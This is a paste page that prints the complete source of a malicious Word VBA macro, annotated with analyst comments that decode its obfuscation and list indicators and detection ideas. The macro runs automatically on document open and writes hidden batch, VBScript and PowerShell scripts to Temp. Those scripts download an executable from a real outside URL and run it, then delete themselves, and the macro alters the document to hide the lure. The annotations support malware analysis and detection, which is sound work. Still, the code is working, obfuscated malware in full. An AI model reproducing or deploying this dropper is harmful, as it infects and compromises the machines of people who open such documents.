johnmccash

Malicious Word Macro

Feb 4th, 2015
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Sub Auto_Open()
      ' Analyst note: auto-execution entry point. Its only action is to call h(),
      ' which holds the dropper logic, so opening the document with macros enabled
      ' is enough to start the chain. AutoOpen() and Workbook_Open() in this module
      ' both forward here.
  10.     h
  11. End Sub
  12. Sub h()
      ' ---------------------------------------------------------------------------
      ' Analyst annotation (defensive reading aid; every code line is unchanged).
      '
      ' Purpose: dropper stage of the macro. It
      '   1. rebuilds file names and paths from split strings / Chr() / Asc() calls,
      '   2. deletes any earlier copies of its script files,
      '   3. reads the Windows version through WMI,
      '   4. writes helper scripts (.bat + .vbs, plus .ps1 on the newer-Windows
      '      branch) into a Temp directory,
      '   5. starts the batch file hidden with Shell(..., 0),
      '   6. edits the document body (findTest / secondTest / tag replacement).
      '
      ' Indicators visible on this page (defanged where applicable):
      '   URL   : hxxp://vestegnenbordtennis[.]dk/wp-content/themes/twentyten/vv.exe
      '   Files : c:\Users\<user>\AppData\Local\Temp\adobeacd-update.ps1 / .vbs / .bat
      '           c:\Users\<user>\AppData\Local\Temp\444.exe
      '           c:\Windows\Temp\adobeacd-updatexp.vbs
      '           c:\Windows\Temp\adobeacd-update.bat
      '           c:\Windows\Temp\444.exe
      '
      ' Detection ideas: an Office process writing .bat/.vbs/.ps1 files into Temp;
      ' an Office process spawning cmd.exe / cscript.exe; powershell.exe started
      ' with "-ExecutionPolicy bypass -noprofile -file" pointing at a Temp path.
      ' The dropped scripts delete themselves, so process-creation and file-creation
      ' telemetry is more reliable than an on-disk search after the fact.
      ' ---------------------------------------------------------------------------
  13. Dim ASJDIWQ, ASKDHQ, ASKDJLQWKJD
  14. Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR
       ' "us" + "er" + "name" -> Environ("username"): current user, used to build
       ' the per-user Temp path.
  15.      USER = Environ("us" + "er" + "name")
       ' ds is only used as an offset for Chr() arithmetic below (ds + 15 = "s",
       ' ds + 16 = "t").
  16.      ds = 100
  17.      jks = ds
  18.      
       ' Base names, split to defeat simple string matching. Decoded:
       '   PST2 / VBT2 / BART2 = "adobeacd-update", VBTXP2 = "adobeacd-updatexp"
  19.      PST2 = "a" + "dobe" & "acd-u" & "pdate"
  20.      VBT2 = "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te"
  21.      VBTXP2 = "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p"
  22.      BART2 = "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date"
  23.      
       ' Extensions appended. Decoded:
       '   PST1 = "adobeacd-update.ps1", VBT1 = "adobeacd-update.vbs",
       '   VBTXP = "adobeacd-updatexp.vbs", BART = "adobeacd-update.bat"
  24.      PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
  25.      VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
  26.      VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
  27.      BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
  28.      
       ' Full drop paths:
       '   MY_FILENDIR = ...\AppData\Local\Temp\adobeacd-update.ps1
       '   ASDASDSA    = ...\AppData\Local\Temp\adobeacd-update.bat
       '   MY_FILDIR   = ...\AppData\Local\Temp\adobeacd-update.vbs
       '   XPFILEDIR   = c:\Windows\Temp\adobeacd-updatexp.vbs
       '   TRT/KRT/HYF = c:\Windows\Temp\adobeacd-update.bat
       ' ASJDKHSJADASDSA is a filler string; it is not read anywhere on this page.
  29.      MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
  30.      ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
  31.      ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
  32.      MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
  33.      XPFILEDIR = "c:\Windows\Temp\" + VBTXP
  34.      TRT = "c:\Windows\Temp\" + BART
  35.      KRT = TRT
  36.      HYF = KRT
  37.      
       ' Cleanup of earlier runs: errors are suppressed, file attributes are reset
       ' to normal, and each script file is deleted if Dir() finds it.
       ' On Error Resume Next stays in effect for the rest of the procedure, so
       ' failing statements below are skipped silently.
  38.       On Error Resume Next
  39.      SetAttr MY_FILENDIR, vbNormal
  40.      
  41.      If (Len(Dir(MY_FILENDIR)) <> 0) Then
  42.       Kill MY_FILENDIR
  43.      End If
  44.      
  45.      On Error Resume Next
  46.      SetAttr ASDASDSA, vbNormal
  47.      If (Dir(ASDASDSA) <> "") Then
  48.       Kill ASDASDSA
  49.      End If
  50.      
  51.      On Error Resume Next
  52.      SetAttr MY_FILDIR, vbNormal
  53.      If (Dir(MY_FILDIR) <> "") Then
  54.       Kill MY_FILDIR
  55.      End If
  56.      
  57.      On Error Resume Next
  58.      SetAttr XPFILEDIR, vbNormal
  59.      If (Dir(XPFILEDIR) <> "") Then
  60.       Kill XPFILEDIR
  61.      End If
  62.      
       ' File-number variables for the Open/Print #/Close calls below. mttt is a
       ' Chr() offset (set to 88 later); jskw receives the OS version.
  63.      Dim FileNumber As Integer
  64.      Dim FileNumb As Integer
  65.      Dim FileNu As Integer
  66.      Dim FileNuG As Integer
  67.      Dim FileNukk As Integer
  68.      Dim FileNs As Integer
  69.      Dim mttt As Integer
  70.      Dim retVal As Variant
  71.      Dim jskw As Integer
  72.      FileNumber = FreeFile
  73.      FileNumb = FreeFile
  74.      FileNu = FreeFile
  75.      FileNukk = FreeFile
  76.      FileNs = FreeFile
  77.      FileNuG = FreeFile
       ' Host fingerprinting: queries Win32_OperatingSystem over WMI (root\cimv2).
       ' The first loop builds a SysReport string that is not used again on this
       ' page; the second loop keeps the Version string for the branch below.
  78.      Dim objWMIService As Variant
  79.     Dim colOperatingSystems As Variant
  80.     Dim objOperatingSystem As Variant
  81.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  82.     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  83.     For Each objOperatingSystem In colOperatingSystems
  84.         SysReport = SysReport & "The operating system on this computer is " & _
  85.             objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
  86.     Next
  87.      
  88.      Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  89.      Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  90.      For Each objOperatingSystem In colOperatingSystems
  91.         winverstr = objOperatingSystem.Version
  92.     Next
  93.    
  94.    
       ' Val() keeps the leading numeric part of the version string. jskw is
       ' declared As Integer, so the value is coerced to a whole number on
       ' assignment. The first branch tests jskw, the second tests winver.
  95.     winver = Val(winverstr)
  96.     WaitFor (1)
  97.     jskw = winver
  98.  
       ' ---- Branch A: version <= 5.5 (Windows XP era). Everything is staged in
       ' c:\Windows\Temp.
  99.  If (jskw <= 5.5) Then
        ' Writes c:\Windows\Temp\adobeacd-update.bat. Decoded content: "@echo off";
        ' ping lines that look like delays; unused labels; a cscript.exe call on
        ' adobeacd-updatexp.vbs (the downloader written below); a line that runs
        ' c:\Windows\Temp\444.exe; then a loop that deletes both script files
        ' until neither exists.
        ' KALJSKAD / PIKUIASD are filler assignments that are never read.
  100.      Open HYF For Output As #FileNuG
  101.      Print #FileNuG, "@echo off"
  102.      Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
  103.      Print #FileNuG, ":ksadatk"
  104.      KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
  105.      PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
  106.      Print #FileNuG, ":kcscriptw"
  107.      Print #FileNuG, ":asdsadas"
  108.      Print #FileNuG, ":cscripdiqwojd"
  109.      Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
  110.      Print #FileNuG, "ping 1.1.2.2 -n" & " 2"
  111.      KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
  112.      PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
  113.      Print #FileNuG, "" & ":windows"
  114.      KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
  115.      PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
  116.      Print #FileNuG, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + "x" + "e"
  117.      Print #FileNuG, ":loop"
  118.      Print #FileNuG, "ping 1.1.2.2 -n" & " 1"
  119.      Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  120.      Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
  121.      Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + BART + Chr(34) + " goto loop"
  122.      Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
  123.      Print #FileNuG, "exit"
  124.      Close #FileNuG
  125.      
  126.      WaitFor (2)
        ' mttt = 88 is the base for the Chr() arithmetic that spells
        ' "MSXML2.XMLHTTP" plus the closing quote (88 - 54 = 34).
  127.      mttt = 88
  128.  
        ' Writes c:\Windows\Temp\adobeacd-updatexp.vbs, a VBScript downloader:
        '   strRT       = hxxp://vestegnenbordtennis[.]dk/wp-content/themes/twentyten/vv.exe
        '   strTecation = c:\Windows\Temp\444.exe
        ' It issues a synchronous GET via MSXML2.XMLHTTP and, on HTTP 200, saves the
        ' response body to disk through a binary ADODB.Stream (Type = 1).
  129.      Open XPFILEDIR For Output As #FileNumber
  130.      Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://vestegnenbordtennis.dk/wp-content/themes/twentyten/vv" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  131.      Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  132.      
  133.      Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
  134.      'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
  135.    
  136.      Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
  137.      
  138.      Print #FileNumber, "objXMLHTTP.send() "
  139.      Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
  140.      
  141.      Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "A" + "D" + "OD" + "B.S" + "tream" + Chr(34) + ") "
  142.      
  143.      Print #FileNumber, "objADOStream.Open "
  144.      Print #FileNumber, "objADOStream.Type = 1"
  145.      Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
  146.      Print #FileNumber, "objADOStream.Position = 0 "
  147.      Print #FileNumber, "objADOStream.SaveToFile strTecation "
  148.      Print #FileNumber, "objADOStream.Close "
  149.      Print #FileNumber, "Set objADOStream = Nothing "
  150.      Print #FileNumber, "End if "
  151.      Print #FileNumber, "Set objXMLHTTP = Nothing"
  152.      Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")"
  153.      Close #FileNumber
  154.      
  155.      WaitFor (1)
  156.      
        ' Launches the batch file with window style 0 (hidden). Resulting chain:
        ' Office -> adobeacd-update.bat -> cscript adobeacd-updatexp.vbs -> 444.exe.
  157.      ASKJD = TRT
  158.      retVal = Shell(ASKJD, 0)
  159.      
  160. End If
  161.  
  162.  
       ' ---- Branch B: version > 5.5 (Vista and later). Everything is staged in
       ' the user's AppData\Local\Temp.
  163. If (winver > 5.5) Then
        ' Writes adobeacd-update.ps1, a PowerShell downloader. Decoded:
        '   $down = New-Object System.Net.WebClient
        '   $url  = hxxp://vestegnenbordtennis[.]dk/wp-content/themes/twentyten/vv.exe
        '   $file = ...\Temp\444.exe
        ' It sets a Safari-on-OS-X User-Agent header (usable as a network
        ' indicator), calls DownloadFile, sleeps 15 s, then runs 444.exe through
        ' cmd.exe /c.
        ' The script paths are emitted as PowerShell string concatenations
        ' ('...'+'.'+'v'+'bs') so the extensions never appear whole in the .ps1.
        ' The tail of the script removes the .vbs, the .bat, 444.exe and the .ps1
        ' itself.
  164.      Open MY_FILENDIR For Output As #FileNumber
  165.      Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  166.      Print #FileNumber, "$url  = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://vestegnenbordtennis.dk/wp-content/themes/twentyten/vv" & ".e" & "x" + "e';"
  167.      Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
  168.      Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25';" + ""
  169.      Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
  170.      Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  171.      Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  172.    
  173.      Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
  174.      Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
  175.      Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
  176.      
  177.      Print #FileNumber, "Start-Sleep -s 15;"
        ' The two long-named assignments below are filler; neither is read on this page.
  178.      PRINTFILENUGSAASJHKDJSAKHDS = "ASKDHJASKDJKAHDSHJKASH  HJKAHJSA JK"
  179.      PRISAKUDHNTFILENUGSAASJHKDJSAKHDS = "ASKDHJASSJKADHKDJKAHDSHJKASH  HJKAHJKASHDJSA JK"
  180.      Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
  181.      Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  182.      Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
  183.      Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  184.      Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  185.      Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  186.      Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  187.      Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  188.      Close #FileNumber
  189.    
        ' Writes adobeacd-update.vbs, a VBScript launcher. Its final line decodes to
        ' objShell.Run "powershell.exe -noexit -ExecutionPolicy bypass -noprofile
        ' -file " & currentFile,0,true -- the .ps1 is run hidden, with the
        ' execution policy bypassed, and the script waits for it to finish.
  190.     Open MY_FILDIR For Output As #FileNumb
  191.     Print #FileNumb, "Dim dff"
  192.     Print #FileNumb, "dff = 68"
  193.     Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
  194.     Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
  195.     Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
  196.     Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
  197.     Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
  198.     Close #FileNumb
  199.    
        ' Writes adobeacd-update.bat, the first link of the chain. It switches the
        ' console to code page 1251 (Windows Cyrillic), rebuilds ".vbs" from three
        ' environment variables so the extension is never literal in the file, and
        ' runs the .vbs with cscript.exe.
  200.     Open ASDASDSA For Output As #FileNs
  201.     Print #FileNs, "@echo off"
  202.     Print #FileNs, "ping 1.1.2.2 -n" & " 2"
  203.     Print #FileNs, "chcp 1251"
  204.     Print #FileNs, ":csakclasjdklas"
  205.     Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
  206.     Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
  207.     Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
  208.     Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34) + "%Var1%%Var2%%Var3%"
  209.     Print #FileNs, "exit"
  210.     Close #FileNs
  211.        
  212.     SetAttr MY_FILENDIR, vbNormal
  213.     SetAttr ASDASDSA, vbNormal
  214.     SetAttr MY_FILDIR, vbNormal
  215.      
  216.     WaitFor (1)
        ' Launches the batch file with window style 0 (hidden). Resulting chain:
        ' Office -> .bat -> cscript .vbs -> powershell .ps1 -> download -> cmd /c 444.exe.
  217.     SJAKLD = ASDASDSA
  218.     retVal = Shell(SJAKLD, 0)
  219. End If
  220.  
  221.      
        ' Document-side changes, run on both branches. findTest deletes the text
        ' between <select> ... </select>; secondTest sets the text between
        ' <inbox> ... </inbox> to black. The four loops below then replace the
        ' marker tags themselves with a space in every story range.
        ' NOTE(review): presumably this swaps an "enable macros" lure for decoy
        ' content once the macro has run -- confirm against the carrier document.
  222.      findTest
  223.     secondTest
  224.     For Each myStoryRange In ActiveDocument.StoryRanges
  225.     With myStoryRange.Find
  226.         .Text = "<" & "sel" & "ect>"
  227.         .Replacement.Text = " "
  228.         .Wrap = wdFindContinue
  229.         .Execute Replace:=wdReplaceAll
  230.     End With
  231.     Next myStoryRange
  232.  
  233.     For Each myStoryRange In ActiveDocument.StoryRanges
  234.     With myStoryRange.Find
  235.         .Text = "</s" & "ele" & "ct>"
  236.         .Replacement.Text = " "
  237.         .Wrap = wdFindContinue
  238.         .Execute Replace:=wdReplaceAll
  239.     End With
  240.     Next myStoryRange
  241.    
  242.     For Each myStoryRange In ActiveDocument.StoryRanges
  243.     With myStoryRange.Find
  244.         .Text = "<" & "in" & "box>"
  245.         .Replacement.Text = " "
  246.         .Wrap = wdFindContinue
  247.         .Execute Replace:=wdReplaceAll
  248.     End With
  249.     Next myStoryRange
  250.  
  251.     For Each myStoryRange In ActiveDocument.StoryRanges
  252.     With myStoryRange.Find
  253.         .Text = "</" & "in" & "box>"
  254.         .Replacement.Text = " "
  255.         .Wrap = wdFindContinue
  256.         .Execute Replace:=wdReplaceAll
  257.     End With
  258.     Next myStoryRange
  259.      
  260.  
  261. End Sub
  262. Sub WaitFor(NumOfSeconds As Long)
       ' Analyst note: delay helper. Spins until Timer (seconds since midnight)
       ' reaches the start value plus NumOfSeconds, calling DoEvents on each pass
       ' so the host application stays responsive. h() calls it between writing the
       ' script files and launching them.
       ' SngSec is declared As Long, so the Timer sum is coerced to a whole number.
  263. Dim SngSec As Long
  264. SngSec = Timer + NumOfSeconds
  265.  
  266. Do While Timer < SngSec
  267. DoEvents
  268. Loop
  269.  
  270. End Sub
  271.  
  272. Sub AutoOpen()
       ' Analyst note: AutoOpen is the macro name Word runs automatically when a
       ' document is opened; it only forwards to Auto_Open.
  273.     Auto_Open
  274. End Sub
  275. Sub Workbook_Open()
       ' Analyst note: Workbook_Open is the Excel workbook-open event name; it only
       ' forwards to Auto_Open. Together with Auto_Open and AutoOpen the module
       ' covers several Office auto-execution names. The presence of these names is
       ' a useful static triage signal for macro-bearing attachments.
  276.     Auto_Open
  277. End Sub
  278. Sub findTest()
       ' Analyst note: locates the first "<select>" marker and the following
       ' "</select>" marker in the active document and deletes the range between
       ' them (selRange.Delete). The marker strings are split to avoid literal
       ' matches; ASKASAIEJ / ASKUKKIEJ / ASKSASADW are filler assignments.
       ' NOTE(review): presumably removes lure text shown before macros are
       ' enabled -- confirm against the carrier document.
  279. Dim firstTerm As String
  280. Dim secondTerm As String
  281. Dim rrtt As Range
  282. Dim selRange As Range
  283. Dim selectedText As String
  284.  
  285. Set rrtt = ActiveDocument.Range
       ' firstTerm = "<select>", secondTerm = "</select>"
  286. firstTerm = "<" + "s" + "e" & "le" + "ct>"
  287. secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
  288. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
  289. With rrtt.Find
  290. .Text = firstTerm
  291. .MatchWholeWord = True
  292. .Execute
  293. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
       ' Collapse to the end of the opening tag; the deletion range starts there.
  294. rrtt.Collapse direction:=wdCollapseEnd
  295. Set selRange = ActiveDocument.Range
  296. selRange.Start = rrtt.End
  297. .Text = secondTerm
  298. .MatchWholeWord = True
  299. .Execute
  300. ASKSASADW = "asjldklas"
       ' Collapse to the start of the closing tag; the deletion range ends there.
  301. rrtt.Collapse direction:=wdCollapseStart
  302. selRange.End = rrtt.Start
  303. selectedText = selRange.Delete
  304. End With
  305. End Sub
  306.  
  307. Sub secondTest()
       ' Analyst note: locates the first "<inbox>" marker and the following
       ' "</inbox>" marker in the active document and sets the font colour of the
       ' range between them to black. myRanget is declared but never used;
       ' ASKIEJ is a filler assignment.
       ' NOTE(review): presumably reveals decoy text that was hidden by colour
       ' until the macro ran -- confirm against the carrier document.
  308. Dim firstTerm As String
  309. Dim secondTerm As String
  310. Dim myRanget As Range
  311. Dim yytt As Range
  312. Dim selRanget As Range
  313. Dim selectedTextt As String
  314.  
  315. Set yytt = ActiveDocument.Range
       ' firstTerm = "<inbox>", secondTerm = "</inbox>"
  316. firstTerm = "<" + "in" & "bo" + "x>"
  317. secondTerm = "</" + "in" & "bo" + "x>"
  318. With yytt.Find
  319. .Text = firstTerm
  320. .MatchWholeWord = True
  321. .Execute
  322. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
       ' Collapse to the end of the opening tag; the recoloured range starts there.
  323. yytt.Collapse direction:=wdCollapseEnd
  324.  
  325. Set selRanget = ActiveDocument.Range
  326. selRanget.Start = yytt.End
  327. .Text = secondTerm
  328. .MatchWholeWord = True
  329. .Execute
  330.  
       ' Collapse to the start of the closing tag; the recoloured range ends there.
  331. yytt.Collapse direction:=wdCollapseStart
  332. selRanget.End = yytt.Start
  333. selectedTextt = selRanget
  334. selRanget.Font.Color = wdColorBlack
  335. End With
  336. End Sub